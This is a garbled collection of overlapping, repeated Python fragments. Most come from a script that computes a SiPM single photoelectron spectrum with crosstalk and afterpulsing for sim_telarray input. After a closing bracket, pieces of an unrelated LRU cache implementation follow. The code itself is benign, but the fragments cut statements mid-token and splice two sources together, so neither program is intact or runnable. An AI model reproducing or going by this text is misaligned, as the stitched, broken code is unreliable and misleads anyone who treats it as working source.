parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap',", "microcells due 
to optical crosstalk pct = ((1 - opct) * np.power(opct, N", "the single photoelectron response for an SiPM. ' 'Can be used as an", "spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap = pct * papk", "= x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y", "* np.power(opct, N - 1) * binom(N - 1, 0))[:, 0] sap =", "float Distance of afterpulse peak from main peak \"\"\" n_peaks = 100 N", "* papk pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K *", "os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y)))", "after normalisation with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as", "\"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x,", "= pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2)", "spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap = args.dap print(", "pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def", "embed from matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma, opct,", "p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap),", "dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store',", "the single photoelectron peak opct : float Probability of optical crosstalk pap :", "print( \"\"\" SPE Parameters: spe_sigma = {} opct = {} pap = {}", "Width of the single photoelectron peak opct : float Probability of optical crosstalk", "opct : float Probability of optical crosstalk pap : float Probability of afterpulse", "the afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir = args.output_dir", "1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): 
print(\"Creating directory:", "peak opct : float Probability of optical crosstalk pap : float Probability of", "= args.spe_sigma opct = args.opct pap = args.pap dap = args.dap print( \"\"\"", "y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight')", "as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula", "parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap',", "be used as an input to sim_telarray after normalisation with Konrads script \"\"\"", "None] K = np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due", "float Probability of afterpulse dap : float Distance of afterpulse peak from main", "= y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma,", "ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single photoelectron response for", "script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for", "afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of the afterpulse", "only considers the case for a 100% probability of a single inital fired", "ndarray X points to evaluate at spe_sigma : float Width of the single", "opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only", "N[:, 0]) p0ap = pct * papk pap1 = pct * (1-papk) *", "opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir,", "sim_telarray after ' 'normalisation with Konrads 
script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output',", "from IPython import embed from matplotlib import pyplot as plt import os def", "= y > 1E-15 x = x[gt] y = y[gt] # Resample x", "an input to sim_telarray after normalisation with Konrads script \"\"\" import argparse from", "np.power(opct, N - 1) * binom(N - 1, 0))[:, 0] sap = spe_sigma", "K = np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due to", "standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type", "= p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K *", "binom(N - 1, 0))[:, 0] sap = spe_sigma papk = np.power(1 - pap,", "dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of the single '", "- 1, 0))[:, 0] sap = spe_sigma papk = np.power(1 - pap, N[:,", "args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap", "x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y =", "x = x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000)", "y > 1E-15 x = x[gt] y = y[gt] # Resample x =", "dap : float Distance of afterpulse peak from main peak \"\"\" n_peaks =", "sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K]", "to sim_telarray after normalisation with Konrads script \"\"\" import argparse from argparse import", "* spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2) signal =", "** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] *", "of a single inital fired microcell Parameters ---------- x : ndarray X points", "from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import", "argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import binom", "single photoelectron response for 
an SiPM. Can be used as an input to", "y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15 x", "spe_sigma = {} opct = {} pap = {} dap = {} \"\"\".format(spe_sigma,", "Obtain the single photoelectron response for an SiPM. Can be used as an", "import binom from scipy.stats import norm from IPython import embed from matplotlib import", "np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y)", "print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created", "'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True,", "{}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config :", "spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation", "= args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap =", "peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:,", "= {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0,", "action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0,", "description = ('Obtain the single photoelectron response for an SiPM. 
' 'Can be", "argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special", "with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output", "'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct", "scipy.special import binom from scipy.stats import norm from IPython import embed from matplotlib", "of optical crosstalk pap : float Probability of afterpulse dap : float Distance", "Parameters: spe_sigma = {} opct = {} pap = {} dap = {}", "K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0)", "response for an SiPM. ' 'Can be used as an input to sim_telarray", "y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct,", "1E-15 x = x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(),", "spe_sigma, opct, pap, dap) gt = y > 1E-15 x = x[gt] y", "x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating", "opct, pap, dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma,", "pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\")", "photoelectron peak opct : float Probability of optical crosstalk pap : float Probability", "np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal", "('Obtain the single photoelectron response for an SiPM. 
' 'Can be used as", "script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as", "from scipy.special import binom from scipy.stats import norm from IPython import embed from", "spe_sigma : float Width of the single photoelectron peak opct : float Probability", "sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15 x = x[gt]", "= ((1 - opct) * np.power(opct, N - 1) * binom(N - 1,", "the case for a 100% probability of a single inital fired microcell Parameters", "single inital fired microcell Parameters ---------- x : ndarray X points to evaluate", "= np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due to optical", "np from scipy.special import binom from scipy.stats import norm from IPython import embed", "dest='dap', action='store', default=0, type=float, help='Value for the distance of the afterpulse peak '", "papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap", "help='Value for the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct',", "help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability", "pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description =", "action='store', default=0, type=float, help='Value for the distance of the afterpulse peak ' 'from", "from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100%", "pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap **", "+= pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description", "= 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability", "main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1,", "of afterpulse peak from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:,", "norm 
from IPython import embed from matplotlib import pyplot as plt import os", "args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap = args.dap", "output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path", "peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct", ": float Width of the single photoelectron peak opct : float Probability of", "0))[:, 0] sap = spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap", "as an input to sim_telarray after ' 'normalisation with Konrads script') parser =", "dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the", "args.spe_sigma opct = args.opct pap = args.pap dap = args.dap print( \"\"\" SPE", "plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__ == '__main__': main()", "main(): description = ('Obtain the single photoelectron response for an SiPM. 
' 'Can", "pap, N[:, 0]) p0ap = pct * papk pap1 = pct * (1-papk)", "' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical", "((1 - opct) * np.power(opct, N - 1) * binom(N - 1, 0))[:,", "default=0, type=float, help='Value for the distance of the afterpulse peak ' 'from main", "import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import binom from", "n_peaks)[:, None] # Probability of n fired microcells due to optical crosstalk pct", "argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma',", "sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path", "= os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path =", "dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store',", "default=0.1, type=float, help='Value for the standard deviation of the single ' 'photoelectron peak')", "SiPM. ' 'Can be used as an input to sim_telarray after ' 'normalisation", "response for an SiPM. 
Can be used as an input to sim_telarray after", "This implementation only considers the case for a 100% probability of a single", "** 2) ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K] *", "action='store', default=0.1, type=float, help='Value for the standard deviation of the single ' 'photoelectron", "n fired microcells due to optical crosstalk pct = ((1 - opct) *", "pct = ((1 - opct) * np.power(opct, N - 1) * binom(N -", "SPE Parameters: spe_sigma = {} opct = {} pap = {} dap =", "papk = np.power(1 - pap, N[:, 0]) p0ap = pct * papk pap1", "fired microcells due to optical crosstalk pct = ((1 - opct) * np.power(opct,", "= argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files')", "return signal.sum(0) def main(): description = ('Obtain the single photoelectron response for an", "an SiPM. ' 'Can be used as an input to sim_telarray after '", "numpy as np from scipy.special import binom from scipy.stats import norm from IPython", "afterpulse peak from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None]", "N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of n", "for an SiPM. 
' 'Can be used as an input to sim_telarray after", "implementation only considers the case for a 100% probability of a single inital", "= os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__", "of the single photoelectron peak opct : float Probability of optical crosstalk pap", "afterpulse dap : float Distance of afterpulse peak from main peak \"\"\" n_peaks", "normalisation with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter", "100% probability of a single inital fired microcell Parameters ---------- x : ndarray", "to sim_telarray after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o',", "{}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path))", "def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G", "microcell Parameters ---------- x : ndarray X points to evaluate at spe_sigma :", "for an SiPM. 
Can be used as an input to sim_telarray after normalisation", "pap = args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {}", "= np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of n fired", "binom from scipy.stats import norm from IPython import embed from matplotlib import pyplot", "a 100% probability of a single inital fired microcell Parameters ---------- x :", "= sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15 x =", "np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x,", "plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from", "action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value", "optical crosstalk pct = ((1 - opct) * np.power(opct, N - 1) *", "'Can be used as an input to sim_telarray after ' 'normalisation with Konrads", "K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single", "norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return", "dap) gt = y > 1E-15 x = x[gt] y = y[gt] #", "np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y", "\"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\")", "- opct) * np.power(opct, N - 1) * binom(N - 1, 0))[:, 0]", "to evaluate at spe_sigma : float Width of the single photoelectron peak opct", "Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy", "float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the", 
"output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if", "---------- x : ndarray X points to evaluate at spe_sigma : float Width", "from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K =", ") x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap)", "probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of", "y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x,", "'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk')", "= sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir)", "\"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case", "used as an input to sim_telarray after normalisation with Konrads script \"\"\" import", "a single inital fired microcell Parameters ---------- x : ndarray X points to", "the distance of the afterpulse peak ' 'from main peak') args = parser.parse_args()", "signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main():", "np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir):", "config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure", "directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard", "default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', 
action='store', default=0, type=float,", "2) ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x,", "help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for", "os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir,", "args.opct pap = args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma =", "= {} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) )", "2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x,", "main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct =", "single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for", "parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap", "peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap',", "help='Value for the distance of the afterpulse peak ' 'from main peak') args", "optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses')", "peak from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K", "* (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma =", "case for a 100% probability of a single inital fired microcell Parameters ----------", "= args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct", "' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store'," ]
[ "return None def put(self, key: str, value: str) -> None: # eviction if", "used\" cache, which evicts the least recently used item. The cache should map", "__init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must be a positive", "Get key from linked list node and remove key from hash table. \"\"\"", "list. Insert key -> node mapping into hash table. Retrieving Value by Key:", "def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must be a", "point into the nodes of a linked list, which represents last-use ordering. Do", "average case O(1) time: Inserting Key, Value Pair: Create a linked list node", "\"least recently used\" cache, which evicts the least recently used item. The cache", "insert and retrieve a value associated with a particular key) and be initialized", "least recently used item. The cache should map from keys to values (allowing", "value associated with a particular key) and be initialized with a max size.", "represents last-use ordering. Do the following in average case O(1) time: Inserting Key,", "key -> node mapping into hash table. Retrieving Value by Key: Look up", "front of linked list. Hash table does not need to be updated. Eviction:", "and key not in self.map: node = self.use_ordering.pop() if node is not None:", "from keys to values (allowing you to insert and retrieve a value associated", "LRU Cache: Design and build a \"least recently used\" cache, which evicts the", "Insert key -> node mapping into hash table. Retrieving Value by Key: Look", "a value associated with a particular key) and be initialized with a max", "of linked list. Hash table does not need to be updated. Eviction: Remove", "mapping into hash table. Retrieving Value by Key: Look up node in hash", "value. Update most recently used item Finding Least Recently Used: Least recently used", "Finding Least Recently Used: Least recently used item will be found at the", "tail of linked list. 
Get key from linked list node and remove key", "key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data", "put(self, key: str, value: str) -> None: # eviction if cache is full", "eviction if cache is full if len(self.map) == self.capacity and key not in", "positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList", "DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None", "table. Retrieving Value by Key: Look up node in hash table and return", "full if len(self.map) == self.capacity and key not in self.map: node = self.use_ordering.pop()", "with key, value. Insert into head of linked list. Insert key -> node", "Eviction: Remove tail of linked list. Get key from linked list node and", "Remove tail of linked list. Get key from linked list node and remove", "Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) ->", "data.value return None def put(self, key: str, value: str) -> None: # eviction", "from linked list node and remove key from hash table. \"\"\" from typing", "a particular key) and be initialized with a max size. When it is", "used item Finding Least Recently Used: Least recently used item will be found", "ordering. Do the following in average case O(1) time: Inserting Key, Value Pair:", "by Key: Look up node in hash table and return value. Update most", "and the values are strings. (16.25, p533) Solution: Use hash table to point", "LruCache: def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must be", "last-use ordering. Do the following in average case O(1) time: Inserting Key, Value", "is full if len(self.map) == self.capacity and key not in self.map: node =", "which evicts the least recently used item. 
The cache should map from keys", "Recently Used: Move node to front of linked list. Hash table does not", "if len(self.map) == self.capacity and key not in self.map: node = self.use_ordering.pop() if", "self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList()", "str value: str class LruCache: def __init__(self, capacity: int): if capacity < 1:", "import * class Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity:", "item Finding Least Recently Used: Least recently used item will be found at", "import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value: str", "datastructures.linked_list import * class Item(NamedTuple): key: str value: str class LruCache: def __init__(self,", "least recently used item. You can assume the keys are integers and the", "class Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity: int): if", "class LruCache: def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must", "node and remove key from hash table. \"\"\" from typing import NamedTuple, Dict", "When it is full, it should evict the least recently used item. You", "particular key) and be initialized with a max size. When it is full,", "item. You can assume the keys are integers and the values are strings.", "linked list. Hash table does not need to be updated. Eviction: Remove tail", "ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node]", "hash table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import * class", "= capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self,", "raise ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity self.map: Dict[str,", "key) and be initialized with a max size. 
When it is full, it", "recently used item will be found at the end of the linked list.", "self.use_ordering.append_left(node) data: Item = node.data return data.value return None def put(self, key: str,", "strings. (16.25, p533) Solution: Use hash table to point into the nodes of", "should evict the least recently used item. You can assume the keys are", "of linked list. Insert key -> node mapping into hash table. Retrieving Value", "need to be updated. Eviction: Remove tail of linked list. Get key from", "and build a \"least recently used\" cache, which evicts the least recently used", "following in average case O(1) time: Inserting Key, Value Pair: Create a linked", "The cache should map from keys to values (allowing you to insert and", "will be found at the end of the linked list. Updating Most Recently", "map from keys to values (allowing you to insert and retrieve a value", "(allowing you to insert and retrieve a value associated with a particular key)", "the least recently used item. The cache should map from keys to values", "NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value: str class", "Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value: str class LruCache:", "= DLinkedList() def get(self, key: str) -> Optional[str]: if key in self.map: node:", "hash table and return value. Update most recently used item Finding Least Recently", "self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value", "-> None: # eviction if cache is full if len(self.map) == self.capacity and", "into the nodes of a linked list, which represents last-use ordering. Do the", "and return value. Update most recently used item Finding Least Recently Used: Least", "table and return value. Update most recently used item Finding Least Recently Used:", "integers and the values are strings. 
(16.25, p533) Solution: Use hash table to", "value: str) -> None: # eviction if cache is full if len(self.map) ==", "Retrieving Value by Key: Look up node in hash table and return value.", "* class Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity: int):", "list. Hash table does not need to be updated. Eviction: Remove tail of", "key from linked list node and remove key from hash table. \"\"\" from", "be initialized with a max size. When it is full, it should evict", "nodes of a linked list, which represents last-use ordering. Do the following in", "key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node)", "str) -> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node)", "head of linked list. Insert key -> node mapping into hash table. Retrieving", "initialized with a max size. When it is full, it should evict the", "Create a linked list node with key, value. Insert into head of linked", "if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key] =", "evict the least recently used item. You can assume the keys are integers", "from typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str", "keys are integers and the values are strings. (16.25, p533) Solution: Use hash", "len(self.map) == self.capacity and key not in self.map: node = self.use_ordering.pop() if node", "Key, Value Pair: Create a linked list node with key, value. Insert into", "node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return", "node with key, value. Insert into head of linked list. Insert key ->", "of the linked list. Updating Most Recently Used: Move node to front of", "from hash table. 
\"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import *", "< 1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity", "DLinkedList() def get(self, key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node", "1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity self.map:", "linked list. Insert key -> node mapping into hash table. Retrieving Value by", "table does not need to be updated. Eviction: Remove tail of linked list.", "-> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data:", "at the end of the linked list. Updating Most Recently Used: Move node", "values (allowing you to insert and retrieve a value associated with a particular", "node to front of linked list. Hash table does not need to be", "size. When it is full, it should evict the least recently used item.", "str class LruCache: def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity", "a \"least recently used\" cache, which evicts the least recently used item. The", "hash table. Retrieving Value by Key: Look up node in hash table and", "to front of linked list. Hash table does not need to be updated.", "Use hash table to point into the nodes of a linked list, which", "build a \"least recently used\" cache, which evicts the least recently used item.", "self.use_ordering.pop() if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key]", "must be a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] =", "capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key:", "capacity: int): if capacity < 1: raise ValueError(\"capacity must be a positive integer\")", "which represents last-use ordering. 
Do the following in average case O(1) time: Inserting", "int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def", "cache, which evicts the least recently used item. The cache should map from", "if capacity < 1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int", "and be initialized with a max size. When it is full, it should", "in self.map: node = self.use_ordering.pop() if node is not None: del self.map[node.data.key] node", "list. Get key from linked list node and remove key from hash table.", "a linked list node with key, value. Insert into head of linked list.", "Used: Move node to front of linked list. Hash table does not need", "DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if key in self.map:", "Value by Key: Look up node in hash table and return value. Update", "it is full, it should evict the least recently used item. You can", "data: Item = node.data return data.value return None def put(self, key: str, value:", "if cache is full if len(self.map) == self.capacity and key not in self.map:", "to be updated. Eviction: Remove tail of linked list. Get key from linked", "it should evict the least recently used item. You can assume the keys", "Move node to front of linked list. Hash table does not need to", "key: str value: str class LruCache: def __init__(self, capacity: int): if capacity <", "recently used\" cache, which evicts the least recently used item. The cache should", "and remove key from hash table. \"\"\" from typing import NamedTuple, Dict from", "Design and build a \"least recently used\" cache, which evicts the least recently", "can assume the keys are integers and the values are strings. (16.25, p533)", "are integers and the values are strings. (16.25, p533) Solution: Use hash table", "in hash table and return value. 
